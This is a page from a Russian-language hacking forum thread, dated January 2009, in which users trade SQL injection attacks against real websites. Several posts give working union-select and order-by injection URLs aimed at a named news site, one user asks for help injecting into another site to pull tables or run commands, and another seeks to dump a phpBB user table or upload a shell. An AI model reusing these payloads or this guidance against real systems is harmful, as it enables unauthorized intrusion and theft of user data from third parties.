ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #5041  
Старый 25.01.2009, 23:32
Neponomat
Новичок
Регистрация: 23.01.2009
Сообщений: 11
Провел на форуме:
60789

Репутация: 0
По умолчанию

Цитата:
Сообщение от j0ker13  
2Neponomat а ключ /s не катит?)
а что это означает?
 

  #5042  
Старый 25.01.2009, 23:38
kevmen
Участник форума
Регистрация: 29.10.2008
Сообщений: 165
Провел на форуме:
397889

Репутация: 60
Отправить сообщение для kevmen с помощью ICQ
По умолчанию

http://www.mormontimes.com/mormon_voices/?id=3237+union+select+1,2,3,4,5,6,7,8,9,10,11,12,1 3,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29, 30,31,32

я так понял стоит фильтрация на union?
 

  #5043  
Старый 25.01.2009, 23:47
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865

Репутация: 571
Отправить сообщение для R1dex с помощью ICQ
По умолчанию

Код:
http://www.mormontimes.com/mormon_voices/?id=3237)+union+select+1,2,3,4,5,6,7,8,9,10,11,12,1 3,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29, 30,31,32--+
Чтобы увидеть вывод: =-3237)+union...
 

  #5044  
Старый 25.01.2009, 23:54
KranC
Новичок
Регистрация: 25.01.2009
Сообщений: 1
Провел на форуме:
7283

Репутация: 0
По умолчанию

с чего ты взял что там 32 поля?

+order+by+ - не прокатывает
+union+ - вроде как отключен
 

  #5045  
Старый 25.01.2009, 23:57
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865

Репутация: 571
Отправить сообщение для R1dex с помощью ICQ
По умолчанию

Цитата:
Сообщение от KranC  
с чего ты взял что там 32 поля?

+order+by+ - не прокатывает
+union+ - вроде как отключен
Код:
http://www.mormontimes.com/mormon_voices/?id=3237)+order+by+32--+
Читайте внимательнее, сверху же l1ght написал....

Что значит "union отключен"? )))
 

  #5046  
Старый 26.01.2009, 00:09
xcedz
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141

Репутация: 3099


По умолчанию

Цитата:
Сообщение от KranC  
с чего ты взял что там 32 поля?

+order+by+ - не прокатывает
+union+ - вроде как отключен
методом научного тыка =\ order by 33 нет вывода а 32 есть. читаем статьи. а лучше изучить логику скл запросов.
 

  #5047  
Старый 26.01.2009, 01:58
j0ker13
Участник форума
Регистрация: 28.07.2008
Сообщений: 199
Провел на форуме:
861008

Репутация: 58
По умолчанию

2Neponomat чтоб добавить запись в реестр без запроса юзай так: "regedit /s 1.reg"
 

  #5048  
Старый 26.01.2009, 14:47
Qwert321
Новичок
Регистрация: 25.01.2009
Сообщений: 1
Провел на форуме:
4954

Репутация: 0
По умолчанию

Вообщем такая ситуация нарисовалась =) нашел уязвимость..но ничего не могу сделать т.е - The following SQL error occurred: The following table could not be opened.
d:\88.4.211.213\[securedir?????????]/webgene\//*{}*\\
(101)

вот что пишет ... вот это значение могу менять - //*{}*\\ ...т.е запрос типа
?p_file=//*{}*\\&
можно вывести 1001 ошибку... кто подскажет как инжект параметр туда...всё перепробовал никак не катит... ну чтобы таблицы получить или команду выполнить
Кстати да...это не PHP движок а простой хтмл ну как вы видите... или я ошибаюсь =)
 

  #5049  
Старый 26.01.2009, 14:52
groundhog
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549

Репутация: 1318


Отправить сообщение для groundhog с помощью ICQ
По умолчанию

Урлу сюда
 

  #5050  
Старый 26.01.2009, 17:25
mak-shapova
Новичок
Регистрация: 11.01.2009
Сообщений: 15
Провел на форуме:
8148

Репутация: 13
По умолчанию

здравствуйте
у меня есть доступ к админке phpbb 2.0.13
мне нужно слить базу ~200 метров, но мне надо только таблу с юзерами
захожу в Backup Database, там выбираю Full backup, но сливается только 80% базы, а в конце дампа ошибка
SQL Error : 2013 Lost connection to MySQL server during query<br /><br />SHOW FIELDS FROM phpbb_ranks</br /><br />Line : 375<br />File : admin_db_utilities.php

как слить таблицу phpbb_users, или как залить шелл в phpbb 2.0.13
 
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ